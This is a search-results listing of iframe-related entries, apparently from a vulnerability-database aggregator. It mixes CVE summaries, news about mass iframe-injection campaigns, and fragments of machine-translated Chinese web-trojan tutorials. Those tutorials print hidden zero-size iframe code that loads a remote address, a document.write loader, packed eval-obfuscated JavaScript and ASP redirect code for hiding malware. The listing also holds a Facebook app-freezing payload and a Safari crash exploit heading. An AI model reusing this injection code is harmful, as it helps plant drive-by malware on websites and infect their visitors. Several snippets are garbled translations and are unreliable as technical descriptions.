5123 matches found
Code injection
WebKit before r53607, as used in Google Chrome before 4.0.249.89, allows remote attackers to discover a redirect's target URL, for the session of a specific user of a web site, by placing the site's URL in the HREF attribute of a stylesheet LINK element, and then reading the...
CVE-2010-0315
Removed by vendor...
Mozilla IFRAME Style Change Handling Code Execution (CVE-2008-1236)
Firefox is an open source web browser developed by Mozilla Foundation. The application is capable of interpreting and rendering many types of Internet content, including various versions of HTML, XML, CSS Cascade Style Sheet, Javascript, various graphic formats, and so on. Firefox is made availab...
Facebook For iPhone Cross Site Scripting
Facebook for iPhone persistent XSS Facebook application for iPhone is not encoding special characters in Notes detail Adding this code in a note will freeze application: var x = 'x'; while 1 document.write''; x = x + 'x'; App page: http://www.facebook.com/apps/application.php?id=6628568379...
New SQL Injection Affects 132,000
A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites; The injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. Read the full article...
1 0 kind of hung it to the way-vulnerability warning-the black bar safety net
A:The frame hanging horse iframe src=address width=0 height=0/iframe II:the js file hanging horse First, the following code document. write"iframe width='0' height='0' src='address'/iframe"; 保存 为 xxx.js that The JS hung it to the code script language=javascript src=xxx. js/script Three:js...
Hung it to the two new methods 1 1 hackers Handbook manuscript-a vulnerability warning-the black bar safety net
Hung it to the two new methods lcx Here only to do a technical discussion, not a specific hazard of the things. If you want to use my method to do it, I can't help it, huh. On the hanging horse is basically in a web page the original code of Riga contained an iframe. On loading the iframe, I used...
Pony hide another method-vulnerability warning-the black bar safety net
The following is the source code.. you can set the parameters of the content plus the pony and then encrypted. OK.. html body % if request"dst""dst" then 'determine whether the parameters are correct. Incorrect access a non-existent address response. write"iframe src=dst width='1 0 0%' height='1 ...
SeaMonkey scriptable plugin execution in mail (mfsa2010-06)
The mail component in Mozilla SeaMonkey before 1.1.19 does not properly restrict execution of scriptable plugin content, which allows user-assisted remote attackers to obtain sensitive information via crafted content in an IFRAME element in an HTML e-mail message, as demonstrated by a Flash objec...
Mozilla Firefox IFRAME Cross Site Scripting (CVE-2005-1476)
Mozilla browsers use the W3C Document Object Model DOM to provide a structural representation of an HTML document and define the way this structure is to be accessed from scripts. One of the core objects exposed by DOM is the window object, which is used to represent a browser window. An HTML pag...
Code injection
Apple Safari on iPhone OS 3.0.1 allows remote attackers to cause a denial of service application crash via a long tel: URL in the SRC attribute of an IFRAME element...
CVE-2009-3271
Apple Safari on iPhone OS 3.0.1 allows remote attackers to cause a denial of service application crash via a long tel: URL in the SRC attribute of an IFRAME element...
CVE-2009-3271
Apple Safari on iPhone OS 3.0.1 is reported vulnerable to a remote denial-of-service via a long tel: URL in the SRC attribute of an IFRAME element. The underlying issue is the handling of oversized tel: URIs in IFRAME SRCs, which can cause the browser to crash. The CVE is CVE-2009-3271. Affected ...
Break IE security restrict access to the iframe sub-frame within the local cookie-vulnerability warning-the black bar safety net
Source: aullik5 Today this article is mainly to say the following so a few things: 1. iframe limitations 2. Break the iframe to get the local cookie ideas 3. Use Cross Iframe Trick breakthrough iframe security restrictions My test environment is: IE 7 7.0.5730.13 All of the following content all...
Apple Safari IPhone (using tel:) Remote Crash Exploit
No description provided by source. Apple Safari Iphone Crash using tel: Found by cloud : cloudatmadpowahdotorg http://blog.madpowah.org Tested on Iphone 3G, OS 3.0.1 Launch Safari, enter the page and after a few seconds Safari will crash and black screen will appear Exploit: ?php settimelimit0;...
Parsing JS Trojan attack with anti-bug warning-the black bar safety net
Web hang horse has now become hackers launched cyber attacks the main one way, and therefore protect against Web security threats, it is particularly important, this article will introduce some of the common JS hung it to the phenomenon and how to respond. Trojan has always been a hack of adept...
55,000 Hacked Sites Serving Malware Cocktail
Security researchers are raising an alarm for a potent malware cocktail — backdoor Trojans and password stealers — being pushed to Windows users from about 55,000 hacked Web sites. According to Mary Landesman, a researcher in ScanSafe’s security threat alert team, the cybercriminals have embedded...
the swf calls the net horse-vulnerability warning-the black bar safety net
The afternoon of research about the swf calling network horse, do not understand the swf yeah, the package pure script class net horse no problem, the package of the overflow type net horse will have problems. Simply or directly call the iframe, so it is a bit boring, really 脱裤子放屁 Yeah, but still...
Examples teach you to understand the net horse-vulnerability warning-the black bar safety net
The main code is as follows: SCRIPT language=”JavaScript” window. status=”completed”; evalfunctionp,a,c,k,e,de=functioncreturn c. toString3 6;if!”. replace/^/,Stringwhilec–dc. toStringa=kc||c. toStringak=functionereturn de;e=functionreturn’\\w+’;c=1;whilec–ifkcp=p. replacenew...
Linea 21 1.2.1 Cross Site Scripting
0000000000000000000000000000000000 000000000000000000000 00000000000000000000000000000000000 0000000000000000 00000000000000000000000000000000 + Linea 21 version 1.2.1 search XSS, Iframe Injection and Redirect Vulnerability + + Download : http://www.linea21.com/index.php/Actualites + + Discovered...